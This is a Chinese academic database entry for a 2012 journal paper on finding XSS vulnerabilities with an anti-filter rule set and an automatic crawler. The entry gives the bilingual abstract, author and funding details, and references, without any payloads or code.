期刊文献+
任意字段
题名或关键词
题名
关键词
文摘
作者
第一作者
机构
刊名
分类号
参考文献
作者简介
基金资助
栏目信息

基于反过滤规则集和自动爬虫的XSS漏洞深度挖掘技术 被引量:12

Technique for Deep Discovering XSS Vulnerability Based on Anti-Filter Rules Set and Automatic Crawler Program
下载PDF
导出
摘要 为解决Web网站跨站脚本攻击(XSS)问题,通过对XSS漏洞特征及过滤方式的分析,提出了通过反过滤规则集转换XSS代码并用自动爬虫程序实现漏洞代码的自动注入和可用性检验的XSS漏洞挖掘技术,依此方法可以获取XSS漏洞代码的转换形式及漏洞的注入入口,以实现对Web跨站漏洞深度挖掘.提出的XSS漏洞挖掘技术在邮箱XSS漏洞挖掘及Web网站XSS漏洞检测方面的实际应用验证了该技术的有效性. To guard against the WEB site's cross-site scripting(XSS) attacks,the characteristics and filtering mode of XSS vulnerabilities were analyzed.A technical scheme for XSS vulnerabilities discovery was presented.First,an anti-filter rules set was used to convert the XSS code and then an automatic crawler program was employed to inject the XSS code and test it's usability.Finally,the effective XSS code and the point of the injected code could be acquired.The presented method has been successfully used to discover the XSS vulnerabilities of web-email and web site.
作者 吴子敬 张宪忠 管磊 胡光俊
机构地区 齐齐哈尔大学应用技术学院 公安部第一研究所
出处 《北京理工大学学报》 EI CAS CSCD 北大核心 2012年第4期395-401,共7页 Transactions of Beijing Institute of Technology
基金 国家自然科学基金资助项目(60873008)
关键词 跨站 XSS反过滤 XSS漏洞挖掘 自动爬虫 cross-site anti-XSS rules set XSS vulnerabilities discovery technique automatic crawler
分类号 TP309.2 [自动化与计算机技术—计算机系统结构]
  • 相关文献

参考文献10

  • 1黄玮,崔宝江,胡正名.Web应用程序客户端恶意代码技术研究与进展[J].电信科学,2009,25(2):72-79. 被引量:9
  • 2褚诚云.跨站脚本XSS安全漏洞[J].程序员,2008(11):97-99. 被引量:4
  • 3Johns M, Engelmann B, Posegga J. XSSDS: server-side detection of cross-site scripting attacks[C-I,//Proceedings of Computer Security Applications Conference. IS. 1. ] : IEEE, 2008..335 - 344.
  • 4Klein A. DOM based cross site scripting or XSS of the third kind[-JT. Web Application Security Consortium, 2005,4:59 - 64.
  • 5Jovanovic N, Kruegel C, Kirda E. Pixy.. a static analysis tool for detecting Web application vulnerabilities [J-]. IEEE, 2006,126..258-263.
  • 6陈嘉迅.论跨站脚本(XSS)攻击的危害、成因及防范[J].网络与信息,2008(9):80-80. 被引量:6
  • 7Artzi S, Kiezun A, Dolby J, et al. Finding bugs in dynamic web applications E C ff Proceedings of the 2008 International Symposium on Software Testing and Analysis. [-S. 1. 1: ACM, 2008:261 -272.
  • 8Vogt P, Nentwich F, Jovanovic N, et al. Cross site scripting prevention with dynamic data tainting and static analysis[C]//Proceedings of the Network and Dis- tributed System Security Symposium (NDSS). New York, USA..[s. n. ], 2007..95 - 102.
  • 9Tang Zhushou, Zhu Haojin, Cao Zhenfu, et al. LWMxD: lexical based webmail XSS discoverer[,C] ff Proceedings of the First International Workshop on Security in Computers, Networking and Commu- nications. [-S. 1. ] : IEEE, 2008:976 - 981.
  • 10Ismail O, Etoh M, Kadobayashi Y. A proposal and implementation of automatic detection/collection system for cross-site scripting vulnerability [-C3 // Proceedings of the 18th International Conference on Advanced Information Networking and Applications. Washington, D.C. , USA: IEEE. 2004,129 - 136.

二级参考文献24

  • 1W3C document object model, http://www.w3.org/DOM/
  • 2Query J. http://jquery.com/
  • 3Reilly O T. What is Web 2.0. http://www.oreilly.com/pub/a/oreilly/ tim/news/2005/09/30/what-is-web-20.html
  • 4http://openkapow.com/.
  • 5http://dodgeit.net/.
  • 6http://mailbucket.org/.
  • 7http://www.mailinator.com/.
  • 8http://www.adobe.com/devnet/flashplayer/articles/flash_player_9_ security. pdf.
  • 9https://login.alibaba.com/login.htm.
  • 10Sotirov A. Heap feng shui in JavaScript. http://www.determina. com/security.research/presentations/bh-eu07/bh-eu07-sotirov-paper. html

共引文献15

同被引文献48

引证文献12

二级引证文献35

北京理工大学学报
2012年 第4期

相关作者

内容加载中请稍等...

相关机构

内容加载中请稍等...

相关主题

内容加载中请稍等...

浏览历史

内容加载中请稍等...
;
使用帮助 返回顶部